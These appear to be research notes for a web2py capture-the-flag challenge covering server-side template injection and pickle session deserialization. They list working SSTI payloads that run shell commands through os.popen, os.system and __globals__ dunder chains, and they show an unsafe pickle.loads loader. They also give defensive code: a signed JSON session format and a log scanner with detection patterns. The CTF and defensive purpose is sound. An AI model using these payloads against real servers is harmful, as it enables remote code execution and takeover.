# Web2py Vulnerability Research

## Challenge Overview

- **Framework**: web2py (old Python web framework)
- **Goal**: Execute `/readflag` to read `/root/flag.txt`
- **Hint**: Related to react2shell vulnerability (CVE-2025-55182)

## React2Shell Connection

React2shell is a **Remote Code Execution** vulnerability in React Server Components where:

- Attackers send crafted HTTP requests
- Server-side code gets executed
- CVSS 10.0 critical vulnerability

Based on my research into web2py and the react2shell vulnerability context, here's what you should focus on for this CTF challenge:

## Key Areas to Investigate in web2py Documentation

Since the challenge is inspired by **react2shell** (a deserialization/template injection RCE vulnerability with CVSS 10.0), you should focus on these specific areas in the web2py documentation:

### **1. Chapter 5: The Views (Template Engine) - HIGHEST PRIORITY**

[web2py.com/books/default/chapter/29/05/the-views](https://www.web2py.com/books/default/chapter/29/05/the-views)

**Why**: web2py templates allow **arbitrary Python code execution** within `{{...}}` tags. This is the most likely attack surface.[1][2]

**Key vulnerability points**:

- Templates can execute ANY Python code including `import` statements[1]
- Access to global objects: `request`, `response`, `session`, `cache`[1]
- Access to `request.env` which contains all WSGI environment variables and HTTP headers[3]
- Can define functions, import modules, and execute system commands

**Potential exploitation paths**:

```python
{{import os}}
{{=os.popen('id').read()}}

# or via __import__
{{__import__('os').popen('whoami').read()}}

# or through request object
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
```

### **2. Chapter 4: The Core (Request/Response Objects)**

[web2py.com/books/default/chapter/29/04/the-core](https://www.web2py.com/books/default/chapter/29/04/the-core)

**Why**: This chapter documents what is reachable through the `request`, `response`, and `session` objects that every view can see.[3]

**Key objects to abuse**:

- `request.env` - Contains environment variables and HTTP headers
- `request.application.__globals__` - Access to global namespace
- `response.render()` - Explicit view rendering
- Session handling and cookies

### **3. Known web2py Vulnerabilities (Research Context)**

From my research, web2py has historical vulnerabilities similar to react2shell:

**CVE-2016-3957** - Pickle deserialization in sessions:[2][4][5]

- `gluon/utils.py` used `pickle.loads` to deserialize session cookies
- Combined with CVE-2016-3953 (hardcoded session key), allowed RCE

**CVE-2016-3953** - Hardcoded encryption key in `session.connect()`[2]
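The two session CVEs above are really one defect pattern: a cookie that is deserialised with `pickle` and signed with a key that is not secret. As an added example (not web2py code, and not a reproduction of either CVE), here is the hardened form a defender would want: session data carried as JSON, an HMAC tag verified with a constant-time compare before the payload is parsed at all, and the key read from the environment rather than hardcoded. `SESSION_SECRET`, `dump_session`, `load_session` and `tamper_demo` are names chosen for this example.

```python
import base64
import hashlib
import hmac
import json
import os
import pickle  # imported only to show the pattern being replaced

# The secret must be generated per deployment and kept out of source control
# (CVE-2016-3953 was a hardcoded key). The fallback here is a placeholder so
# the example runs stand-alone; it is an assumption of this example, not web2py's config.
SECRET_KEY = os.environ.get("SESSION_SECRET", "dev-only-placeholder-secret").encode()


def load_session_unsafe(cookie: str):
    """The pattern CVE-2016-3957 describes: attacker-controlled bytes reach
    pickle.loads, which runs arbitrary code during unpickling. Shown for contrast only."""
    return pickle.loads(base64.b64decode(cookie))


def _sign(payload: bytes) -> str:
    """HMAC-SHA256 tag over the exact bytes that will be parsed later."""
    return hmac.new(SECRET_KEY, payload, hashlib.sha256).hexdigest()


def dump_session(data: dict) -> str:
    """Serialise as JSON (data only, no executable objects) and append the tag."""
    payload = base64.urlsafe_b64encode(json.dumps(data, sort_keys=True).encode()).decode()
    return payload + "." + _sign(payload.encode())


def load_session(cookie: str):
    """Verify the tag before touching the payload; return None on any tampering or malformed input."""
    try:
        payload, tag = cookie.rsplit(".", 1)
    except ValueError:
        return None
    # Constant-time comparison: a plain == would leak tag bytes through timing.
    if not hmac.compare_digest(_sign(payload.encode()), tag):
        return None
    try:
        return json.loads(base64.urlsafe_b64decode(payload.encode()))
    except (ValueError, UnicodeDecodeError):
        return None


def tamper_demo():
    """Issue a cookie, then try to swap the payload while keeping the original tag (constructed test)."""
    cookie = dump_session({"user_id": 42, "role": "user"})
    _, tag = cookie.rsplit(".", 1)
    forged_payload = base64.urlsafe_b64encode(b'{"role": "admin", "user_id": 42}').decode()
    return load_session(cookie), load_session(forged_payload + "." + tag)


if __name__ == "__main__":
    print(tamper_demo())  # the forged cookie comes back as None
```

The ordering matters: the signature is checked on the raw payload string, so nothing attacker-controlled is parsed before the tag has been validated. Swapping `pickle` for a signed format without also fixing the key would leave the deserialisation safe but the tag forgeable, which is why the notes list the two CVEs together.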

### **4. Specific Documentation Sections to Audit**

**Template syntax that allows code execution**:

- `{{=expression}}` - Evaluates and outputs
- `{{code}}` - Executes arbitrary Python
- `{{def function():}}...{{return}}` - Function definitions[1]

**Objects with dangerous methods**:

```python
# From templates, you can access:
request.__class__
response.__class__.__mro__
session.__class__.__subclasses__()
__builtins__
__import__
globals()
locals()
```

### **5. Attack Vectors to Test**

Given this is a "0-day" CTF challenge inspired by react2shell, look for:

1. **Template Injection via user input**:

   - URL parameters passed to views
   - Form inputs rendered in templates
   - Cookie values used in templates

2. **Deserialization vulnerabilities**:

   - Session cookie manipulation
   - Pickle deserialization in custom code

3. **Access to dangerous objects through template context**:
   ```python
   {{request.application.__globals__}}
   {{response.__class__.__mro__}}
   {{self.__init__.__globals__.__builtins__}}
   ```

### **Quick Test Payloads for SSTI in web2py**

Try injecting these into any user-controllable input that gets rendered:

```python
# Detection
{{7*7}}
{{7*'7'}}

# Information gathering
{{=dir()}}
{{=request}}
{{=request.env}}
{{=globals()}}

# RCE attempts
{{import os; os.system('id')}}
{{__import__('os').popen('cat /flag').read()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('ls -la').read()}}

# Through self object (context-free)
{{self.__init__.__globals__.__builtins__.__import__('os').popen('id').read()}}
```
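From the defender's side, the input locations listed in section 5 and the probe strings above are also what a detection should watch for. The following added example (not from these notes and not part of web2py) scans a few constructed access-log lines, URL-decodes query parameters, path and cookie values, and flags the indicator families those payloads share: template delimiters, dunder introspection, and process-spawning calls. The log layout (combined format with the Cookie header appended as a final quoted field), the `scan_log` function and the sample lines are all constructed for this example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Indicator families drawn from the payload list in these notes (constructed patterns).
INDICATORS = [
    ("template_delimiter", re.compile(r"\{\{.*?\}\}", re.DOTALL)),
    ("dunder_introspection", re.compile(
        r"__(?:import__|globals__|builtins__|subclasses__|mro__|class__|init__)")),
    ("process_spawn", re.compile(r"\b(?:os\.popen|os\.system|subprocess|popen)\s*\(")),
]

# Combined log format plus a trailing quoted Cookie field (constructed layout for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<cookie>[^"]*)"$'
)


def candidate_fields(line: str):
    """Return (client_ip, [(field_name, decoded_value), ...]) for one log line, or (None, [])."""
    m = LOG_RE.match(line)
    if not m:
        return None, []
    fields = []
    parts = urlsplit(m.group("target"))
    # parse_qsl percent-decodes values, so encoded braces such as %7B%7B come back as {{
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        fields.append(("query:" + name, value))
    fields.append(("path", unquote_plus(parts.path)))
    for chunk in m.group("cookie").split(";"):
        if "=" in chunk:
            name, value = chunk.strip().split("=", 1)
            fields.append(("cookie:" + name, unquote_plus(value)))
    return m.group("ip"), fields


def scan_log(lines):
    """One finding per field that matches at least one indicator family."""
    findings = []
    for line in lines:
        ip, fields = candidate_fields(line)
        if ip is None:
            continue  # unparseable line; a real pipeline would count these separately
        for field, value in fields:
            hits = [label for label, pattern in INDICATORS if pattern.search(value)]
            if hits:
                severe = any(h in ("dunder_introspection", "process_spawn") for h in hits)
                findings.append({
                    "ip": ip,
                    "field": field,
                    "indicators": hits,
                    "severity": "high" if severe else "medium",
                })
    return findings


# Constructed sample log: one benign request, two probes in a query parameter, one in a cookie.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2025:10:00:01 +0000] "GET /app/default/index?name=alice HTTP/1.1" 200 512 "session_id_app=abc123"',
    '10.0.0.9 - - [10/Dec/2025:10:00:07 +0000] "GET /app/default/index?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 512 "-"',
    '10.0.0.9 - - [10/Dec/2025:10:00:12 +0000] "GET /app/default/index?name=%7B%7B__import__%28%27os%27%29%7D%7D HTTP/1.1" 200 514 "-"',
    '10.0.0.12 - - [10/Dec/2025:10:01:00 +0000] "POST /app/default/profile HTTP/1.1" 302 0 "theme=%7B%7Brequest.env%7D%7D"',
    "not a log line",
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Decoding before matching is the part that is easy to get wrong: the braces in the sample lines arrive as `%7B%7B`, so a rule written against the raw URL would miss them. The `7*7` probe on its own is scored medium because it is the reconnaissance step; the dunder and process-spawn families mark a request that has moved on to attempting execution.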

### **Summary: Where to Look**

**Primary focus**: Chapter 5 (Views/Templates) - understand template syntax and what Python code can be executed[2][1]

**Secondary focus**: Chapter 4 (Core) - understand `request`, `response`, `session` objects and what they expose[3]

**Exploitation approach**: Look for any place where user input is embedded into a view template without proper sanitization, allowing you to inject `{{malicious_code}}` that gets executed server-side with full Python capabilities.

The similarity to react2shell suggests the vulnerability involves unsafe handling of user data in templates or deserialization, allowing remote code execution through crafted payloads.

[1](https://www.web2py.com/books/default/chapter/29/05/the-views)
[2](https://www.cybersecurity-help.cz/vdb/SB2019062809)
[3](https://web2py.readthedocs.io/_/downloads/en/latest/pdf/)
[4](https://nvd.nist.gov/vuln/detail/CVE-2016-3957)
[5](https://www.cvedetails.com/cve/CVE-2016-3957/)
[6](https://github.com/web2py/web2py-book)
[7](https://www.microsoft.com/en-us/security/blog/2025/12/15/defending-against-the-cve-2025-55182-react2shell-vulnerability-in-react-server-components/)
[8](https://www.vaadata.com/blog/server-side-template-injection-vulnerability-what-it-is-how-to-prevent-it/)
[9](https://www.rapid7.com/db/modules/exploit/linux/http/pyload_js2py_cve_2024_39205/)
[10](https://www.dynatrace.com/news/blog/cve-2025-55182-react2shell-critical-vulnerability-what-it-is-and-what-to-do/)
[11](https://www.paloaltonetworks.com/blog/cloud-security/template-injection-vulnerabilities/)
[12](https://www.splunk.com/en_us/blog/learn/rce-remote-code-execution.html)
[13](https://blog.cloudflare.com/react2shell-rsc-vulnerabilities-exploitation-threat-brief/)
[14](https://portswigger.net/web-security/server-side-template-injection)
[15](https://www.vaadata.com/blog/rce-remote-code-execution-exploitations-and-security-tips/)
[16](https://www.wiz.io/blog/critical-vulnerability-in-react-cve-2025-55182)
[17](https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server_Side_Template_Injection)
[18](https://github.com/web2py/web2py/issues/1205)
[19](https://aws.amazon.com/blogs/security/china-nexus-cyber-threat-groups-rapidly-exploit-react2shell-vulnerability-cve-2025-55182/)
[20](https://www.web2py.com/init/default/changelog)
[21](https://www.miggo.io/vulnerability-database/cve/CVE-2016-3953)
[22](https://www.thehacker.recipes/web/inputs/ssti)
[23](https://www.web2py.com/init/default/examples)
[24](https://www.intigriti.com/researchers/blog/hacking-tools/exploiting-server-side-template-injection-ssti)
[25](https://arxiv.org/html/2405.01118v1)
[26](https://web2py.com/books/default/chapter/34/05/the-views)
[27](https://onsecurity.io/article/server-side-template-injection-with-jinja2/)
[28](https://onsecurity.io/article/server-side-template-injection-with-jinja-2-for-you/)
[29](https://www.invicti.com/web-vulnerability-scanner/vulnerabilities/out-of-band-code-execution-via-ssti-python-mako)
[30](https://stackoverflow.com/questions/24372871/in-web2py-can-i-have-a-template-controller-method-that-can-be-used-across-view)
[31](https://www.okiok.com/server-side-template-injection-from-detection-to-remote-shell/)
[32](https://web2py.readthedocs.io/en/latest/_modules/gluon/template.html)
[33](https://portswigger.net/web-security/server-side-template-injection/exploiting)
[34](https://security.snyk.io/vuln/SNYK-PYTHON-PICKLESCAN-14724492)
[35](https://www.exploit-db.com/exploits/51051)
[36](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation)
[37](https://web2py.com/books/default/chapter/34/09/access-control)
[38](https://stackoverflow.com/questions/35712930/how-can-i-call-a-web2py-url-from-an-outside-module)
[39](https://py4web.com/_documentation/static/pt/chapter-15.html)
[40](https://payatu.com/blog/server-side-template-injectionssti/)
[41](https://swisskyrepo.github.io/PayloadsAllTheThings/Server%20Side%20Template%20Injection/Java/)
[42](https://techbrunch.github.io/patt-mkdocs/Server%20Side%20Template%20Injection/)
[43](https://swisskyrepo.github.io/PayloadsAllTheThings/Server%20Side%20Template%20Injection/Python/)
[44](https://cjharris.co.uk/posts/templated/)
[45](https://snyk.io/blog/jinja2-xss-vulnerability/)
[46](https://podalirius.net/en/articles/python-context-free-payloads-in-jinja-templates/)
[47](https://blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
[48](https://github.com/advisories/GHSA-gp69-xcm6-ffqj)
[49](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Python.md)
[50](https://xygeni.io/blog/server-side-template-injection-explained-with-real-code-examples/)
